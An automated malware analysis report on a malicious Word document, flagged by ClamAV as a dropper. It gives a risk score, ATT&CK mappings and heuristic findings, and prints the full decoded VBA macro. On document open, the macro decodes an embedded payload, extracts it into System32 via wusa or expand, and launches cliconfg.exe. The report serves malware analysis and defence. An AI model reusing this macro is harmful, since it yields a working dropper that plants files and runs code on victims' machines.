MALICIOUS
408
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.003 Windows Command Shell
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. Critical heuristics indicate the use of WScript.Shell and cmd.exe, along with a Shell() call, suggesting the macros are designed to execute arbitrary commands. The presence of a Document_Open macro and the ClamAV detection as 'Doc.Dropper.Agent' strongly indicate that this document acts as a dropper for a second-stage payload.
Heuristics 10
-
ClamAV: Doc.Dropper.Agent-6438391-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6438391-0
-
VBA macros detected medium 7 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
If System.Version >= "6.0" Then nResult = Shell("cmd /c wusa %TEMP%\setup.cab /quiet /extract:%SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe", 0) Else -
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set oWscriptShell = CreateObject("WScript.Shell") sTempPath = oWscriptShell.ExpandEnvironmentStrings("%TEMP%") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set oWscriptShell = CreateObject("WScript.Shell") sTempPath = oWscriptShell.ExpandEnvironmentStrings("%TEMP%") -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
proc_query = "SELECT * FROM Win32_Processor" Set proc_results = GetObject("Winmgmts:").ExecQuery(proc_query) For Each info In proc_results -
cmd.exe reference in VBA high OLE_VBA_CMDcmd.exe reference in VBAMatched line in script
If System.Version >= "6.0" Then nResult = Shell("cmd /c wusa %TEMP%\setup.cab /quiet /extract:%SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe", 0) Else -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
End Function Private Sub Document_Open() With ActiveDocument.Content -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3636 bytes |
SHA-256: 06502a1e57707972f80d60c71cd4d8855da061884b895c72e766f5a5aca9f2e0 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim nResult As Long
Dim sFileName As String
Dim sTempPath As String
Dim sTempFile As String
Dim cbFileBuffer As Long
Private Function debase64(InputFile As String, nOffset As Long, nCount As Long, OutputFile As String) As Long
Dim strKey As String
Dim lpInBuffer
Dim lpOutBuffer() As Byte
Dim chr1, chr2, chr3, enc1, enc2, enc3, enc4 As Byte
Dim nIndex, nResult As Long
strKey = "KXU/yP=B29tLzidqNRuf-SbVInw0oCrmWZk6OpFc7A5GTD1QxaJ3H8h4jMeEsYglv"
Open InputFile For Binary As #1
Seek #1, nOffset + 1
lpInBuffer = Input(nCount, #1)
Close #1
ReDim lpOutBuffer(nCount) As Byte
nIndex = 1
nResult = 0
Do While nIndex <= nCount
enc1 = InStr(1, strKey, Mid(lpInBuffer, nIndex, 1), 0) - 1
nIndex = nIndex + 1
enc2 = InStr(1, strKey, Mid(lpInBuffer, nIndex, 1), 0) - 1
nIndex = nIndex + 1
enc3 = InStr(1, strKey, Mid(lpInBuffer, nIndex, 1), 0) - 1
nIndex = nIndex + 1
enc4 = InStr(1, strKey, Mid(lpInBuffer, nIndex, 1), 0) - 1
nIndex = nIndex + 1
chr1 = (enc1 * 4) Or (enc2 \ 16)
chr2 = ((enc2 And 15) * 16) Or (enc3 \ 4)
chr3 = ((enc3 And 3) * 64) Or enc4
lpOutBuffer(nResult) = chr1
nResult = nResult + 1
If enc3 <> 64 Then
lpOutBuffer(nResult) = chr2
nResult = nResult + 1
End If
If enc4 <> 64 Then
lpOutBuffer(nResult) = chr3
nResult = nResult + 1
End If
Loop
ReDim Preserve lpOutBuffer(nResult - 1) As Byte
Open OutputFile For Binary As #2
Put #2, , lpOutBuffer
Close #2
debase64 = nResult
End Function
Private Function IsWin64() As Boolean
Dim proc_query As String
Dim proc_results As Object
Dim info As Object
Dim IsWin32OrWin64 As String
proc_query = "SELECT * FROM Win32_Processor"
Set proc_results = GetObject("Winmgmts:").ExecQuery(proc_query)
For Each info In proc_results
IsWin32OrWin64 = "Win" & info.AddressWidth
Next info
If IsWin32OrWin64 = "Win32" Then
IsWin64 = False
Else
IsWin64 = True
End If
End Function
Private Sub Document_Open()
With ActiveDocument.Content
.Font.ColorIndex = wdBlack
'.Paragraphs(4).Range.Font.ColorIndex = wdRed
End With
Set oWscriptShell = CreateObject("WScript.Shell")
sTempPath = oWscriptShell.ExpandEnvironmentStrings("%TEMP%")
sFileName = ActiveDocument.FullName
cbFileBuffer = FileLen(sFileName)
If (cbFileBuffer = 81411) Then
sTempFile = sTempPath & "\setup.cab"
nResult = InStr(Application.Path, "x86")
nResult = debase64(sFileName, 50176, 31235, sTempFile)
If System.Version >= "6.0" Then
nResult = Shell("cmd /c wusa %TEMP%\setup.cab /quiet /extract:%SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe", 0)
Else
nResult = Shell("cmd /c expand %TEMP%\setup.cab -F:* %SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe", 0)
End If
End If
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.